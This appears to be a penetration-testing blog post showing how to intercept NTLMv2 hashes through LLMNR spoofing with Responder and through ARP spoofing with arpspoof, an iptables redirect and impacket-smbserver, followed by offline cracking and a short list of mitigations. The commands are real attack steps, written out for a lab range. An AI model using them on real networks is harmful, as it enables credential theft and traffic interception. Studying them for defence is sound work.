If an attacker can persuade a system to connect to a malicious SMB server, they can intercept NTLM-SSP credentials which can then be cracked offline. In this post we’re going to look at a couple of ways that can be achieved.
LLMNR Spoofing With Responder
Our target network is allocated in the 172.16.16.200/29 range.
To begin with, we use CrackMapExec to profile the target range.
We can see three Windows hosts in the environment. Running a packet sniffer on the range, we can see LLMNR traffic:
LLMNR is a broadcast name resolution protocol which is used if DNS name resolution fails. For instance, if host requests a non existent system within a domain, LLMNR packets will broadcast onto the network in the hope that the requested host responds.
We can exploit this condition using Responder. Running Responder will make our Kali host reply to any LLMNR packets, and instruct the source host that our system owns the requested name. Once the source host connects to our Kali system, responder will then request authentication via NTLM.
Responder can be started using:
responder -wrFv -I eth0
After letting it run for a while, host 172.16.16.202 makes a request for fileshare3 which is intercepted, providing us with an NTLMv2-SSP hash:
Copying this hash into a text file, we can then run a wordlist attack, revealing the account password to be “Password1”
We can validate the credential is correct, by using it to attempt to connect to hosts in the network with CrackMapExec:
Responder can perform similar attacks with the older NBNS protocol.
Credential Interception with ARP Spoofing
If LLMR & NBNS are disabled in the target environment, we may still be able to perform Man in The Middle (MITM) attacks using ARP spoofing. Essentially we configure our machine to listen for any ARP requests, and respond with our systems MAC address regardless of the whether the IP address belongs to our machine.
It’s normally best to target specific hosts when doing this, as it can lead to performance degradation on the local network.
On the attacking system, start of by enabling IP forwarding so the traffic will route correctly and add an iptables rule to redirect SMB traffic to the attacking host:
echo 1 > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --dport 445 -j DNAT --to-destination 172.16.16.24:445
Next, use ARPSpoof to start intercepting traffic between the source and destination victim hosts:
arpspoof -i eth0 -t 172.16.16.200 -r 172.16.16.201 &arpspoof -i eth0 -t 172.16.16.201 -r 172.16.16.200
And finally, start impact-smbserver to intercept any requests that will now be redirected to our host:
Impacket-smbserver test .
When the client system (172.16.16.201) attempts to connect to the server, they will then be transparently redirected to our attacker machine:
Impacket-smbserver will then display the clients hashed credentials:
The above examples illustrate a couple of ways credentials can be intercepted via SMB.
It’s important to note that there are many permutations on these attacks. Since UNC paths to SMB shares can be embedded with documents or websites, there are many ways an attacker can persuade a victim machine to connect to them, and subsequently intercept hashed credentials.
To prevent these attacks;
- Disable LLMNR and NBNS protocols if they are not required in your environment.
- Enable SMB signing to prevent SMB relay attacks.
- Configure dynamic ARP inspection on switching equipment to detect ARP MITM.
- Egress filtering of port 445 should be applied on external firewalls to prevent SMB traffic reaching the internet.